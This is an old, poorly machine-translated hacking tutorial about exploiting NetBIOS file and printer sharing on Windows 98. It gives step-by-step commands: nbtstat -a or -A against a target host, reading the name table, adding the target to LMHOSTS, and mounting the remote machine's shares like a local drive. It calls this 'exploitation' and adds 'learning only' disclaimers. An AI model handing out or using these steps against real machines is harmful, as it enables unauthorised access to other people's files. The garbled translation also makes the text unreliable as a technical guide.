NETBIOS
-------------------------------------------------- ------------------------------
Ever hear the term NetBIOS over TCP / IP
If so, should pass over this article
And if belom should be listened to:)
This paper only as a learning purpose only and that we can always cautious. :)
NetBIOS information we can actually use the system for the exploitation of these opponents and a way of exploitable targets using the file / printer Sharring
.gif)
In this article I assume you are using win 98
Before we start let us find nbtstat.exe
Actually the function of these files is to display protocol statistics and connections tcp / ip
Exploitation steps:)
1. Click Start -> Programs -> MS-Dos prompt -> write and then enter nbtstat
2. Click Start -> Run -> write nbtstat and OK
Think about appear like this:
NBTSTAT [[-a RemoteName] [-A IP address] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [interval]]
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP addresses to NetBIOS computer names.
-RR (ReleaseRefresh) Release Name sends packets to WINS and then, starts Refresh
RemoteName Remote host machine name.
IP address Dotted decimal representation of the IP address.
Redisplays interval selected statistics, Pausing interval seconds
between each display. Press Ctrl + C to stop redisplaying statistics.
From the above information we can actually know funsi from nbtstat.exe
On this occasion I will try to review the above 2 options are:
-A
-a
ie we want to try the computer with the names belog.wasantara.net.id
then we use:
nbtstat-a belog.wasantara.net.id
example we want to try the computer with ip 192.168.1.1
then we use:
nbtstat-A 192.168.1.1
From the command that appears above possibilities are:
1. Host not found
2. And such a beautiful message below:
--------------------------------------------
NetBIOS Local Name Table
Name Type Status
---------------------------------------------
Belog <00> UNIQUE Registered
Polos <00> GROUP Registered
Belog <03> UNIQUE Registered
Belog <20> UNIQUE Registered
Polos <1E> GROUP Registered
---------------------------------------------
If the message Host not found, immediately stop your efforts, because it will useless waste of time:)
If a message appears as beautiful as the above, you should take a breath, because other jobs will be waiting.
From the beautiful message that the record is Belog characters with code <20> UNIQUE Registered, because this is the 20th conceited information file and printer sharing.
What's our next step?
Once we have the info above, locate the file named:
LMHOST or HOST (win 9x)
If you've met, opening with such noteped editor and add:
192.168.1.1 Belog
Then save.
Next
Click Start -> Find -> Computer
input name or ipnya
And you'll be screaming delight, because the remote computer you can make as your secondary HD:)
Congratulations:)
nb: once again, this article please only as learning materials only and is not used to damage and of this paper I hope, we should not casually open the file / printer sharing
